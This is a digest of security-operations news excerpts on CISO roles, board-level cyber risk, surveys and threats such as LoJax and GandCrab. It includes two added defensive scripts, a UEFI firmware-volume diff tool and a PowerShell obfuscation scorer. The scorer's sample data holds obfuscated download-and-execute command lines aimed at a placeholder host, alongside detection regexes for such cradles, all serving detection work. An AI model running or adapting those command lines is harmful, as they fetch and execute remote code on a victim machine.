Trending in Security Operations

Cyber Security Operations Topics, Trends, and Articles

The first 100 days of the new CISO: how to avoid the “curse of firefighting”

The Digital Transformation People article, November 1, 2018

How an incoming executive needs to approach such a complex role is also a hot debate. Many experts – including us – have written about this and have framed the topic using the “first 100 days” journalistic cliché. In our own series, we took issue with the fact that most consultants’ analysis and suggestions fail to consider the incoming CISO within the broader context and organisational complexity of the firm.

In large organisations, no function exists in a vacuum, and getting anything done requires aligning your strategy with other stakeholders’ priorities, business cycles, and budget cycles. It will always take time, as well as political and managerial acumen, but in our opinion there is nothing that could not be set in motion, at least to an extent, within the first six months in office.

4 Dangerous Security Assumptions to Avoid

CSO article, November 1, 2018

Many organizations take steps to guard against data breaches, employing new policies, tools and strategies that make them feel protected, but their defenses may not be as strong as they think. Unfortunately, this false sense of security is all-too-easy to come by.

It’s not unusual for companies to start out in the right direction but fall short in their efforts because one specific area is overlooked. Achieving a high standard of cybersecurity requires a thorough, holistic view of the risks and a robust, continuous effort. The truth is that many organizations do one or two things right and then put their feet up, content to bask in the warm, but erroneous sensation that they’re safe.

Here are four common statements that indicate a false sense of security.

Cybersecurity Professional Impressions on Cloud-native Security

CSO article, October 31, 2018

Organizations use cloud-native security controls, but they really want central management for cloud security across heterogeneous clouds.

In a recent research survey, ESG asked a panel of 232 security and IT professionals a series of questions about cloud-native security (i.e. security controls, management, and monitoring options built into cloud infrastructure and offered by cloud service providers). Here are a few of the data points ESG uncovered...

Cyber Is a Boardroom Issue in 2018

Infosecurity Magazine article, October 30, 2018

Based on studies and interviews with corporate board members and chief information security officers (CISOs), the Cyber Balance Sheet, published by Focal Point Data Risk and produced by the Cyentia Institute, found that boardrooms are engaging in more conversations about security.

While the talks about cyber risk are more commonplace, the C-suite and security leaders are still struggling to effectively translate security risks into an effective decision-making framework that enables the business to operate within its proper risk appetite.

Communication is Broken Between CISOs and the Rest of the Business

SecurityWeek article, October 29, 2018


Time was, the rest of the business might have bought into the idea that IT security was unique among business functions, with processes, standards and language too technical to be understood by ordinary business folk. Cybersecurity management is technical, the thinking went, therefore the results could only be expressed in technical language, too.

That era came to a crashing end in the last few years when crippling malware and devastating data breaches made cyber risks a clear and present danger for the entire organization. Now, board members and senior management are likely to wave off CISO techno-speak and push to get their questions answered on their terms.

The CSO Guide to Top Security Conferences, 2018-19

CSO article, October 25, 2018


There is nothing like attending a face-to-face event for career networking and knowledge gathering, and we don’t have to tell you how helpful it can be to get a hands-on demo of a new tool or to have your questions answered by experts.

Fortunately, plenty of great conferences are coming up in the months ahead.

CSO Online’s calendar of upcoming security conferences makes it easy to find the events that matter the most to our community.

6 Cybersecurity Tools You'll Need to Know About in 2019

HackerNoon article, October 24, 2018

Whether it’s maintaining transparent and reliable voting systems, combatting DDoS attacks at the G20 summit and WTO conference, or even protecting a corporation’s new batch of smart contracts, proactive solutions are necessary in an era when cybercrime seems to reach a new all-time high every few months.

In this vein, smart IT experts and even regular users would be wise to keep an eye on these up-and-comers in the sector. A place on this list means that the company has identified a crucial area of vulnerability in the status quo and has developed a distinctive solution to it.

Questions to Ask Before Accepting that CISO Job Offer

LinkedIn article by Gary Hayslip, October 21, 2018

In writing earlier articles and releasing them to our community, I have been asked by several people if I could make a list of questions to ask at an interview. These would be questions you could ask the interviewer and interview committee to make sure the role you want is the right one for you. In the past I have had positions I wanted, but when asking these questions, the answers I received painted a picture I wanted nothing to do with and I walked away from the position. What is important is that not all of these questions will apply to your situation, but hopefully they will give you some ideas on what to ask during your interview, so you feel comfortable that the role you are interviewing for is a good fit for you and your career.

How CEOs And Boards Can Manage The Strategic Impacts Of Cyber Risk

Forbes article, October 15, 2018

The digitalization of the business landscape offers never-before-seen opportunities but also makes organizations more vulnerable to cyber attacks and breaches. At the highest level, leaders are focused on maturing their cyber risk programs and dealing with the fact that cyber risk is everywhere—from the light switch in the office to the systems storing the organization’s most sensitive information. 

Irfan Saif, principal at Deloitte Risk and Financial Advisory, Deloitte & Touche LLP, shares his perspective on how organizations are currently managing cyber risk.

Gartner Top 10 Strategic Technology Trends for 2019

Gartner Report, October 15, 2018

The Gartner Top 10 Strategic Technology trends highlight changing or not yet widely recognized trends that will impact and transform industries through 2023. 

Trend No. 1: Autonomous Things

Trend No. 2: Augmented Analytics

Trend No. 3: AI-driven Development

Trend No. 4: Digital Twins

Trend No. 5: Empowered Edge

Trend No. 6: Immersive Technology

Trend No. 7: Blockchain

Trend No. 8: Smart Spaces

Trend No. 9: Digital Ethics and Privacy

Trend No. 10: Quantum Computing

Sednit APT Group Uses First UEFI Rootkit Detected in the Wild to Execute LoJax Malware

SecurityIntelligence article, October 4, 2018

For the first time ever, researchers discovered a Unified Extensible Firmware Interface (UEFI) rootkit in the wild that they believe the Sednit advanced persistent threat (APT) group used to execute LoJax malware.

Researchers at ESET observed an attack campaign distributing LoJax and three types of tools. The first component dumped system information into a text file. The second tool read the contents of the Serial Peripheral Interface (SPI) flash memory to save an image of the system’s firmware. The third wrote a UEFI module to the SPI flash memory and installed a UEFI rootkit that’s responsible for dropping LoJax onto the machine.
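The check a practitioner wants after reading this is a way to tell whether a machine's firmware still matches a known-good copy. The script below is an added example, not ESET's tooling and not any of the LoJax components: it diffs a dumped SPI flash image against a baseline one UEFI firmware volume at a time, so a rewritten or added UEFI module shows up as a changed or new volume. It assumes you already hold two raw dumps (how they are obtained is outside the example); the volume header layout is the one fixed by the UEFI PI specification; the sample images, their payloads and offsets are constructed.

```python
"""Diff a dumped SPI flash image against a known-good one, per UEFI firmware volume.

Added example, not ESET's tooling or the LoJax components described above.
Every firmware volume starts with an EFI_FIRMWARE_VOLUME_HEADER whose
fixed layout comes from the UEFI PI specification:
  offset 32  FvLength      UINT64
  offset 40  Signature     "_FVH"
  offset 48  HeaderLength  UINT16
  offset 50  Checksum      UINT16 (16-bit word sum over the header is zero)
  offset 56  BlockMap      {NumBlocks, Length} entries ending in {0, 0}
The sample images built at the bottom are constructed, not real dumps.
"""
import hashlib
import struct

FV_SIGNATURE = b"_FVH"
SIG_OFFSET = 40            # signature sits 40 bytes into the header
MIN_HEADER = 56 + 8        # fixed fields plus the all-zero block-map terminator


def header_checksum_ok(header: bytes) -> bool:
    """EFI_FIRMWARE_VOLUME_HEADER.Checksum makes the 16-bit word sum zero."""
    if len(header) % 2:
        return False
    words = struct.unpack_from("<%dH" % (len(header) // 2), header)
    return sum(words) & 0xFFFF == 0


def find_firmware_volumes(image: bytes):
    """Yield (offset, length, sha256) for each well-formed volume in the image.

    Stray "_FVH" bytes (inside data, or in a damaged header) are skipped when
    the length fields or the header checksum do not hold up.
    """
    pos = 0
    while (sig := image.find(FV_SIGNATURE, pos)) >= 0:
        pos = sig + 1
        start = sig - SIG_OFFSET
        if start < 0 or start + MIN_HEADER > len(image):
            continue
        (fv_len,) = struct.unpack_from("<Q", image, start + 32)
        (hdr_len,) = struct.unpack_from("<H", image, start + 48)
        if hdr_len < MIN_HEADER or fv_len < hdr_len or start + fv_len > len(image):
            continue
        if not header_checksum_ok(image[start:start + hdr_len]):
            continue
        yield start, fv_len, hashlib.sha256(image[start:start + fv_len]).hexdigest()
        pos = start + fv_len        # resume after this volume


def diff_firmware(baseline: bytes, current: bytes) -> dict:
    """Report volumes (by offset) whose content changed, appeared, or vanished."""
    base = {off: digest for off, _, digest in find_firmware_volumes(baseline)}
    cur = {off: digest for off, _, digest in find_firmware_volumes(current)}
    return {
        "modified": sorted(o for o in base if o in cur and base[o] != cur[o]),
        "added": sorted(o for o in cur if o not in base),
        "removed": sorted(o for o in base if o not in cur),
    }


def build_volume(payload: bytes) -> bytes:
    """Construct a minimal volume (header + raw payload) with a valid checksum.

    Real volumes carry FFS files behind the header; a raw payload is enough
    to exercise the parser.
    """
    hdr_len = MIN_HEADER + 8                           # one block-map entry plus terminator
    fv_len = hdr_len + len(payload)
    hdr = bytearray(hdr_len)
    struct.pack_into("<Q", hdr, 32, fv_len)            # FvLength
    hdr[40:44] = FV_SIGNATURE                          # Signature
    struct.pack_into("<H", hdr, 48, hdr_len)           # HeaderLength
    hdr[55] = 2                                        # Revision
    struct.pack_into("<II", hdr, 56, 1, fv_len)        # BlockMap[0]: one block of fv_len bytes
    total = sum(struct.unpack_from("<%dH" % (hdr_len // 2), hdr)) & 0xFFFF
    struct.pack_into("<H", hdr, 50, (-total) & 0xFFFF)  # Checksum: word sum becomes zero
    return bytes(hdr) + payload


ERASED = b"\xff" * 64       # unprogrammed flash between volumes, as on a real part


def sample_images():
    """Constructed baseline plus a copy with one volume altered in place and one appended."""
    boot_payload = b"DXE core and drivers (constructed)".ljust(96, b"\x00")
    rogue_payload = bytearray(boot_payload)
    rogue_payload[40:52] = b"rogue driver"             # same length, so later offsets do not move
    nvram = build_volume(b"variable store (constructed)")
    baseline = ERASED + build_volume(boot_payload) + ERASED + nvram + ERASED
    current = (ERASED + build_volume(bytes(rogue_payload)) + ERASED + nvram + ERASED
               + build_volume(b"dropped volume (constructed)") + ERASED)
    return baseline, current


if __name__ == "__main__":
    base, cur = sample_images()
    print(diff_firmware(base, cur))   # constructed case: one modified, one added volume
```

Run as a script it reports the constructed case; on real dumps, pass the two files' contents to diff_firmware. The variable store changes legitimately between boots, so it will show as modified on every run; compare against a dump taken from the same machine when it was known-good rather than only against the vendor image, and treat a volume that appears where the baseline had erased flash as the strongest signal.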

Cyber Security Is A Business Risk, Not Just An IT Problem

Forbes article, from October, 2017

Gone are the days when companies could pass the headaches of cyber security to the IT department, as it has become more of a business issue too. This is especially important as businesses are more digitized, meaning they are exposed to an increasing number of threats if they do not manage the risk of security properly. While more Hong Kong businesses understand the value of shifting their mindset in cyber security from questioning if their business will experience an attack, to when will they be threatened and how will they respond, they still need to address cyber security as the business risk it is.

In Telstra’s recent Cyber Security report, data shows that 59% of Asian organizations experienced a business-interrupting security breach at least once a month. This comes down to the increase in digitization across the board. As we move towards digitization, the number and type of devices requiring enhanced security measures increase too. Mobiles, tablets, wearables and Internet of Things (IoT) enabled devices are all poorly served by the traditional approach of securing the network perimeter with a firewall. Additionally, new technologies such as artificial intelligence and machine learning are providing attackers with enhanced tools for more complex attacks.

Form factor wars: Cloud-based or on-premises security technologies?

CSO article, September 26, 2018

While most organizations are willing to consider cloud-based or on-premises security solutions, nearly one-third still demand the control associated with on-premises.

Cybersecurity professionals are paid to be paranoid and tend to want to control everything they can to minimize surprises or third-party dependencies. This has always been the case with regards to security technology. Historically, CISOs mistrusted managed services, preferring instead to “own” the deployment and operations associated with their security technologies. 

While cultural attitudes toward security control remain today, demand- and supply-side changes are influencing new security technology decisions.

Lucy Gang Debuts with Unusual Android MaaS Package

ThreatPost article, September 20, 2018

The threat actor’s Android-focused cyber-arms package, dubbed Black Rose Lucy, is limited in reach for now, but clearly has global ambitions.

There’s a fresh bloom in the malware-as-a-service garden: Researchers have uncovered a new Russian-speaking threat actor hawking a proprietary cyber-weapon dubbed “Black Rose Lucy.”

The offering is a malware-as-a-service (MaaS) bundle with two parts, consisting of a controlling web interface (which acts as a dashboard and command-and-control server), and malware that targets Android systems. Infected devices are enslaved to a botnet that’s placed at an operator’s disposal, according to analysis from Check Point.

5 biggest cybersecurity challenges at smaller organizations

CSO article, September 19, 2018

Manual processes, security complexity, and a lack of support from business management plague SMBs.

Aside from security incidents and subsequent actions, what are the major cybersecurity challenges experienced by small and mid-sized organizations? 

ESG asked this question in a survey of 400 IT and cybersecurity professionals working at SMB firms. The results are as follows (multiple responses were accepted):

  • 28% of respondents say their biggest cybersecurity challenge is that their organization depends upon too many manual or informal processes for cybersecurity.
  • 27% of respondents say their biggest cybersecurity challenge is that it is difficult to manage the complexity of too many disconnected cybersecurity tools.
  • 27% of respondents say their biggest cybersecurity challenge is that business managers don’t understand or support strong cybersecurity.
  • 25% of respondents say their biggest cybersecurity challenge is that their organization doesn’t provide an appropriate level of cybersecurity training for non-technical employees, leading to increased risk.
  • 24% of respondents say their biggest cybersecurity challenge is that their organization lacks the right skills to deal with modern types of cyber threats.

The SOC Gets a Makeover

DARK Reading article, September 6, 2018

Today's security operations center is all about reducing the number of alerts with emerging technologies - and enhancing old-school human collaboration. Here's how some real-world SOCs are evolving.

Blame it on the success of the SIEM. For many security operations center (SOC) managers, the security information and event management system was both a blessing and a curse: It was a way to consolidate and correlate security alerts from firewalls, routers, IDS/IPS, antivirus software, and servers, for example, into a centralized console. But with the recent wave of new security tools, threat intelligence feeds, and constantly mutating threats, SOCs are drowning in anywhere from thousands to a million security alerts daily. 

The most important attributes of a cybersecurity platform

CSO article, August 29, 2018

Information security professionals want coverage across major threat vectors, central management, and technologies for prevention, detection, and response in any security platform.

ESG has seen an ongoing cybersecurity technology trend that goes something like this:

  1. Enterprise organizations address cybersecurity using disconnected point tools. This strategy is no longer adequate, as it impacts security efficacy and adds operational overhead.
  2. Security teams address these problems by consolidating and integrating the security tools they use. Many are building security technology architectures a la SOAPA (i.e. security operations and analytics platform architecture).
  3. Seeing this trend in process, security technology vendors push internal development teams to integrate point tools across their portfolio. They then pitch integrated security "platforms" to customers.

Spotlight Shines on Role of CISO

Wall Street Journal article, from June, 2016

Not long ago, many senior management teams regarded their risk executives as “business prevention officers.” For that reason, risk managers often felt like salmon swimming upstream, their advice lost in the press of doing business, according to University of Maryland Executive-in-Residence Clifford Rossi. But large-scale “black swan” events like the 2008 financial crisis demonstrated the perils of leaping after business opportunities without first taking a long, hard look at risk. Since then, chief risk officers (CROs) have gained enormously in respect and prestige and are now seen as “business protectors” essential to success. This has led a number of organizations to increase their risk management budgets (some by as much as 100 percent), raise CRO pay, and make the position a senior management and, in some cases, board-level role, “The Wall Street Journal” reports.

Cybersecurity decisions that can’t be automated

CSO article, September 17, 2018

Encourage those inside and outside your team to identify and challenge daily assumptions in order to adapt to change, think differently and make smarter, faster security related decisions.

Cybersecurity’s future in reducing incident response time is to automate the process. In other words, the process of marking an attack, aggregating key data, identifying the actual threat, assembling the tools and executing actions needs to be as close to machine speed as possible.

Unfortunately, most companies are still outsourcing only 30 percent of the decision-making to AI/cybersecurity programs that allow this, when a minimum of 70 percent is the healthier goal. 

Nevertheless, reaching that goal does not free a CSO or anyone in an organization from making key “human” decisions in the AI/cyber arena. Processes that include automated programs and algorithms are just one part of the job.

CISOs and the Quest for Cybersecurity Metrics Fit for Business

Security Week article, September 17, 2018

Never-ending breaches, ever-increasing regulations, and the potential effect of brand damage on profits has made cybersecurity a mainstream board-level issue. It has never been more important for cybersecurity controls and processes to be in line with business priorities.

A recent survey by security firm Varonis highlights that business and security are not fully aligned; and while security teams feel they are being heard, business leaders admit they aren't listening.

The problem is well-known: security and business speak different languages. Since security is the poor relation of the two, the onus is absolutely on security to drive the conversation in business terms. When both sides are speaking the same language, aligning security controls with business priorities will be much easier.

Well-presented metrics are the common factor understood by both sides and could be used as the primary driver in this alignment. The reality, however, is this isn’t always happening.

A Quantified Approach To Cybersecurity Risk Management

LinkedIn article by Steve King, September 16, 2018

Cybersecurity Risk Assessment should be a hot topic these days. How else can you not only convince your board and management team that you need to do something to protect against cyber-attacks, but also be able to communicate for once in a language they understand?

What if Equifax knew that their risk was quantified at more than $100 million along with a high probability of an ugly event actually happening? Do you think they might have installed that patch? I think they probably would have. Because as things stand right now (one year later) they might not be in business by the second anniversary.

Cybersecurity Skills Report: Today’s CISO is Shifting Toward Strategic Business Enablement

CSO article, September 11, 2018

Businesses and government agencies of all sizes are experiencing cyber attacks that are growing in both frequency and complexity. Cybercriminals, nation-states, and a host of other bad actors are developing new tactics, tools, and procedures to circumvent modern cybersecurity solutions. We are increasingly seeing targeted attacks employing customized malware and the ready availability of dark web market tools and services covering every aspect of the cyber kill chain. In fact, a recent Fortinet Global Threat Landscape Report shows that virtually no firm is immune, with 96% of firms experiencing at least one severe exploit.

In order to address these new threats while maintaining operations, growing the business, executing the mission, and implementing digital transformation, organizations are finding that success requires a balanced focus on both business and security requirements. This development is reflected in the changing roles and responsibilities of the Chief Information Security Officer (CISO). Public sector agencies and private enterprises are now seeking CISOs with the deep technical expertise, organizational leadership, and business acumen needed to achieve business objectives.

PowerShell Obfuscation Ups the Ante on Antivirus

ThreatPost article, September 12, 2018

A new malware sample using a rare obfuscation technique has been spotted that uses the features of PowerShell, a tool that comes built into Microsoft Windows. Analysis from Cylance shows that the tactic succeeds in bypassing most antivirus products.

Cylance researchers stumbled across a malware file using a PowerShell obfuscation method while looking into a set of malicious scripts that had low antivirus detection. The file was a ZIP file containing both a PDF document and a VBS script, and it was flagged by just three antivirus products.
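An added detection example, not from Cylance or the article (which does not describe the specific technique): Python heuristics run over constructed process command lines, scoring generic PowerShell obfuscation indicators that file-based antivirus signatures miss. The same scoring applies to ScriptBlockText from PowerShell Script Block Logging (Event ID 4104) or command lines from an EDR. Indicator names, weights and the threshold are the example's own choices, and the sample lines, including the base64 blob, are constructed.

```python
"""Heuristic triage of PowerShell command lines for obfuscation indicators.

Added example, not Cylance's analysis or the malware from the article. The
write-up does not give the specific technique, so this scores generic tricks
that defeat signature matching but survive in process-creation or Script
Block Logging (Event ID 4104) records: encoded commands, format-operator and
concatenation string assembly, backtick insertion, [char] casts, download
cradles and long high-entropy tokens. Sample lines are constructed.
"""
import math
import re

# Each indicator is a named regex and counts once, however often it matches.
INDICATORS = {
    "encoded_command":   re.compile(r"-e(?:c|nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "hidden_or_quiet":   re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b|-noni(?:nteractive)?\b", re.I),
    "format_operator":   re.compile(r"[\"']\s*-f\s*[\"'(]", re.I),     # ("{1}{0}" -f 'b','a')
    "backtick_in_word":  re.compile(r"[A-Za-z]`[A-Za-z]"),            # i`n`voke-expression
    "char_cast":         re.compile(r"\[char\]\s*\d+", re.I),         # [char]73+[char]69
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "download_cradle":   re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I),
}
CONCAT_FRAGMENT = re.compile(r"[\"'][^\"']{1,4}[\"']\s*\+")          # 'I'+'E'+'X'


def shannon_entropy(text: str) -> float:
    """Bits per character of the empirical character distribution of text."""
    if not text:
        return 0.0
    n = len(text)
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_command(cmd: str) -> dict:
    """Score one command line; each independent indicator adds 2."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
    # Three or more tiny quoted fragments glued with '+' is string assembly.
    if len(CONCAT_FRAGMENT.findall(cmd)) >= 3:
        hits.append("string_concat")
    # A long token with high entropy is usually base64 or compressed data.
    long_tokens = [t for t in cmd.split() if len(t) >= 20]
    max_ent = max((shannon_entropy(t) for t in long_tokens), default=0.0)
    if max_ent > 4.5:
        hits.append("high_entropy_token")
    return {"score": 2 * len(hits), "indicators": hits, "max_token_entropy": round(max_ent, 2)}


def triage(lines, threshold: int = 4):
    """Return (index, result) for every line scoring at or above threshold.

    One indicator alone is routine (-NoProfile on an admin's scheduled
    script), so the default threshold demands two independent signals.
    """
    flagged = []
    for i, line in enumerate(lines):
        result = score_command(line)
        if result["score"] >= threshold:
            flagged.append((i, result))
    return flagged


# Constructed sample command lines: two benign, three obfuscated.
SAMPLE_LINES = [
    r"powershell.exe Get-ChildItem C:\Users -Recurse | Measure-Object",
    r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA",
    "powershell -w hidden (\"{1}{0}{2}\" -f 'sion','Invoke-Expres','') (New-Object Net.WebClient).DownloadString('http://example.invalid/a')",
    "powershell -NoP -c $s='I'+'E'+'X'; $u='ht'+'tp:'+'//ex'+'ample.invalid/p'; i`n`voke-expression (new-object net.webclient).downloadstring($u)",
]

if __name__ == "__main__":
    for idx, res in triage(SAMPLE_LINES):
        print(f"line {idx}: score={res['score']} indicators={res['indicators']}")
```

The threshold is the point: a single indicator is common in legitimate use (the backup script line scores 2 and is not flagged), two independent ones are not. Script Block Logging records script blocks as PowerShell evaluates them, after any string assembly or decoding, so feeding 4104 events to the same scorer catches what a file scanner looking at the ZIP never sees.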

CISOs recommend future actions for their organizations

CSO article, from September 5, 2018

Each year, ESG conducts a research project with the Information Systems Security Association (ISSA) on the mindset of cybersecurity professionals. As part of last year’s research, we asked respondents to identify the top actions their organizations should take in the future to improve cybersecurity. We then looked at this data based upon respondents’ roles, so we could look at the specific recommendations from CISOs (or other titles with equivalent job descriptions).

Using "Digital Twins" to inform Cyber Security Operations

LinkedIn article by Scott Foote, September 3, 2018

The idea of a “Digital Twin” is not new. Engineers and other professionals have been using digital simulation models for many decades to provide the contextual awareness that informs their decision making. These digital simulations are simply formal, detailed versions of the anecdotally-collected mental models that most of us carry around in our heads. With the added benefit of course that digital models can be shared for continuous evolution, verification & validation; and persisted to survive the turnover of personalities and staff.

What is new… is the application of these digital models to the high-tempo, high-risk decision making of Cyber Security Operations.

The surge toward digital transformation continues to compound the complexities of contemporary business models as well as the underlying information technology that supports them. This exponential growth in inter-dependencies and rapid adoption of leading-edge technologies creates risk, a direct result of the ever-growing attack surface that adversaries are increasingly well prepared to exploit, while cyber defenders are hard pressed to keep pace, struggling to maintain an effective comprehension of their “enterprise architecture” as it continuously morphs in pursuit of greater business value.

Why CISOs Should Make Friends With Their CMOs

DARK Reading article, August 27, 2018

A partnership between IT security and marketing could offer many benefits to each group - and to the entire enterprise.

It might not seem like CISOs and CMOs have much in common, but both executives stand to gain by becoming allies.

Every day cybersecurity factors, such as bad breach publicity and phishing impersonators, erode enterprise brands — thereby diminishing the effectiveness of a CMO's daily efforts. Brand value goes down, email marketing ROI gets trashed, and customer churn increases, all of which reflect poorly on the chief marketer. CMOs need help from CISOs to lock down risk factors. On the flip side, CISOs grapple with a number of challenges that CMOs could help them with, including insecure marketing technology and communication processes, breach response communication, and inadequate budget for preserving brand value.

While CISOs and CMOs might never become corporate besties, there's clearly a lot of room for some mutual back-scratching. Here are some proof points to show why a partnership between this pair of executives can benefit both parties, as well as their companies.

What are small organizations doing about cybersecurity?

CSO article, August 21, 2018

According to a survey by ESG, firms with 50 to 499 employees are spending more money, purchasing security product suites, and outsourcing security tasks to MSSPs.

From the survey, two-thirds of firms with 50 to 499 employees have experienced at least one cybersecurity incident over the past few years, leading to lost productivity and business disruptions.  Survey respondents claim that the biggest contributing factors to these cybersecurity incidents included human error, a lack of knowledge about cyber risk, and new IT initiatives lacking proper cybersecurity oversight.

Based upon this data, many small organizations don’t have the skills, staff, or cybersecurity infrastructure to keep up with the threat landscape. 

So, what are they doing to bridge this gap?  Spending more money on cybersecurity for starters.  Fifteen percent of organizations claim they will substantially increase their cybersecurity budgets while another 53 percent will increase their cybersecurity budget somewhat.

Balanced Skills for CISOs

LinkedIn article by Luiz Firmino, August 2, 2018

CISOs must have a keen emotional intelligence to allow them to quickly detect whether their audience is closed to suggestions or possibly even hostile to the suggested or required changes. One of the CISO’s key roles is as translator of tech-related terms and threats into a language appropriate for his or her audience. When conversing with business leaders, the CISO needs to be able to communicate clearly and effectively, in the language of the business, through explanations, metaphors or visual aids. This type of interaction is likely to increase as the CISOs communicate ways to reduce cyber risks to other groups.

Ultimately, the CISO’s currency is trust. CISOs must earn the trust of the rest of the executive team and maintain that trust. In turn, executives and boards have to trust that the CISO will be an accurate vessel through which their wishes will be communicated and executed. Just as importantly, they have to trust that the CISO will be honest and transparent in reporting the true security posture of the organization.

The Good & Bad News About Today's Cybersecurity Investment Landscape

DARK Reading article, July 25, 2018

Lots of things keep CISOs up at night. But instead of guessing what CISOs want, investors and vendors should incorporate customer feedback throughout product ideation and development cycles.

Cyberwar: What happens when a nation-state cyber attack kills?

ZDNet article, from July 24, 2018

A cyber attack that kills someone is getting ever more likely. What happens then is a big -- and scary -- question.

The increasing sophistication and power of state-backed cyber attacks has led some experts to fear that, sooner or later, by design or by accident, one of these incidents will result in somebody getting killed.

It might sound far-fetched, but a former head of the UK's intelligence agency has already warned about the physical threat posed by cyber attacks and the potential damage they could do.

Leveraging Security to Enable Your Business

DarkReading article, February 23rd, 2018

"Wouldn't it be great if everyone were trustworthy? No bad guys trying to break in and steal your cyber assets, and everyone is able to do their jobs unobstructed and without fear of negative consequences? That's when businesses succeed, costs go down, productivity skyrockets, and everyone is happy.

Unfortunately, this is not the world we live in. With both external cyberattacks and insider threats on the rise, companies must protect themselves from threats in their own backyard and the far-reaching corners of the cyber world. Because the risks are so high, many businesses have employed security processes and systems that encroach further and further into the business, hindering daily productivity and causing mass frustration among employees. In the most extreme cases, security has become employee enemy No. 1."

The global cyber war is heating up: Why businesses should be worried

CSO article, February 22nd, 2018

"Nation-state attackers typically go after political targets: the Democratic National Committee, government agencies, critical infrastructure, and defense contractors. It's become increasingly clear that any company, in any industry, could be affected, either as a result of being a deliberate target or as collateral damage in a wider attack.

Campaigns like NotPetya can hit any company, of any size, and even deliberate, targeted, advanced attacks can hit any industry. "Private entities are being targeted every day," says Adam Meyers, VP of intelligence at CrowdStrike."

GDPR is coming, and many organizations aren’t ready

CSO article, February 22nd, 2018

"Each year, ESG surveys around 700 cybersecurity and IT professionals as part of its annual IT spending intentions research (note: I am an ESG employee). In this year’s survey, ESG asked respondents several questions about General Data Protection Regulation (GDPR) readiness.

What we found is alarming. With only a few months until the regulation goes into effect, only 11 percent of those surveyed say they are completely prepared and only 33 percent say their incident response plan meets the GDPR requirement for breach disclosure in 72 hours."

Know Thyself Better Than The Adversary - ICS Asset Identification and Tracking

New SANS blog, February 22nd, 2018

"Globally, we've passed the point where cyber attackers only target and disrupt information technology networks and business applications. Adversaries have stepped up their attack skills targeting ICS in recent years. However, defense is do-able! Facilities can mature their cybersecurity posture to ensure early detection and protection against these growing threats.

With foundational security already in place, the Active Cyber Defense Cycle (ACDC) empowers ICS defenders to actively hunt for advanced threats in their network, a process which drives informed incident response and quick protective actions.

The different phases of the Active Cyber Defense Cycle support one another to enable proactive security. The four ACDC phases are (1) Asset Identification & Network Security Monitoring, (2) Incident Response, (3) Threat & Environment Manipulation, and (4) Threat Intelligence Consumption. This repeatable process, which requires dedicated assets, involves using and sharing threat intelligence, knowing network layouts and assets, actively hunting for threats, rapidly scoping events of interest, and kicking off containment or protection actions to neutralize threats."

Is This The Year of Reckoning for the CISO - Part One

InfoSecurity article, February 20th, 2018

"Whichever way you look at it, the role of CISO is becoming an increasingly unattractive prospect. Whether it’s the sheer scale and variety of 24/7 threats facing businesses today, the complex compliance requirements that must be fulfilled, or the growing scrutiny of cybersecurity operations at board level, it’s almost an unwinnable position.

Despite this, the global demand for experienced CISOs has never been higher. Interestingly, we’re now in a situation where many CISOs simply aren’t ready to rise to the enormous challenge presented to them and in many cases, security teams are failing to effectively secure the interests of the business."

Taking cybersecurity beyond a compliance-first approach

CSO article, February 19th, 2018

"With high profile security breaches continuing to hit the headlines, organizations are clearly struggling to lock down data against the continuously evolving threat landscape. Yet these breaches are not occurring at companies that have failed to recognize the risk to customer data; many have occurred at organizations that are meeting regulatory compliance requirements to protect customer data.

Given the huge investment companies in every market are making in order to comply with the raft of regulation that has been introduced over the past couple of decades, this continued vulnerability is – or should be – a massive concern. Regulatory compliance is clearly no safeguard against data breach."

Introduction to Threat Detection and Response

LinkedIn article, February 5th, 2018

"Cybersecurity starts with the realisation that adversaries in cyberspace pose a threat to the well being of individuals and organisations. The leaders of an organisation may have been informed by the news, law enforcement agencies, compliance officer, a friend, consultant, etc., about the potential risks associated with operating connected information systems.

The first step to managing the cybersecurity risk is to assess it. The risk assessment results in a risk treatment plan and shapes the cybersecurity strategy of the organisation. If a cybersecurity risk cannot be avoided, transferred, or accepted, mitigating controls and capabilities should be implemented to ensure it is reduced to an acceptable level."

Cyber Advisory Board Experts on Threats to the U.S. Grid

The Cipher Brief article, February 4th, 2018

"Former Deputy Secretary of State Robert Work, a member of The Cipher Brief’s Cyber Advisory Board, says potential attacks on the U.S. power grid would most likely come in two flavors. “A localized attack, such as an attack on a city’s power grid, could be mounted by any number of malicious hackers, minor states or terrorists. And a more widespread “counter-value” strike by a large state competitor could target assets that are not a military threat but that an opponent values, such as cities and civilian populations. Counterforce targeting goes after an opponent’s military forces and capabilities.”

Work warns that the U.S. has largely turned away from the thinking behind counter-value targeting, but says that the U.S.’ great power competitors have not. “A widespread counter-value cyberattack on the U.S. power grid that knocked out large parts of the grid for a significant period of time could cause widespread disruption throughout the United States, incalculable economic loss, and potentially loss of life. Such an attack would not be easy. But it is not out of the realm of possibility. And I am less than certain we have hardened the grid enough to thwart a concerted, large-scale cyberattack.”"

Russian Dark Web ad for New GandCrab Ransomware-as-a-Service

SC Media article, February 2nd, 2018

"Researchers investigating the newly discovered GandCrab ransomware have learned how its authors are marketing the malicious program as a ransomware-as-a-service package to potential buyers on the dark web. According to LMNTRIX, the ad offers a partner program, whereby members split GandCrab's profits with the developers 60:40. Additionally, large partners are given the opportunity to increase their share to 70 percent. The authors also offer technical support and updates to buyers.

However, there are caveats: Partners must not target countries in the former Soviet Republics that now comprise the Commonwealth of Independent States, or their accounts will be deleted. Furthermore, "Partners must apply to use the ransomware, and there is a limited amount of ‘seats’ available," LMNTRIX explained in an email to SC Media."

Latest IoT Botnet Displays Evidence of a Halfway Clever Botmaster

Boing Boing article, February 1st, 2018

"The amazing and frightening thing about the Mirai botnet's reign of terror wasn't that it was a super-sophisticated cyberweapon: rather, it was a clumsy, amateurish fuggly hack that turned out to have been produced by a couple of dum-dums with a Minecraft racket.

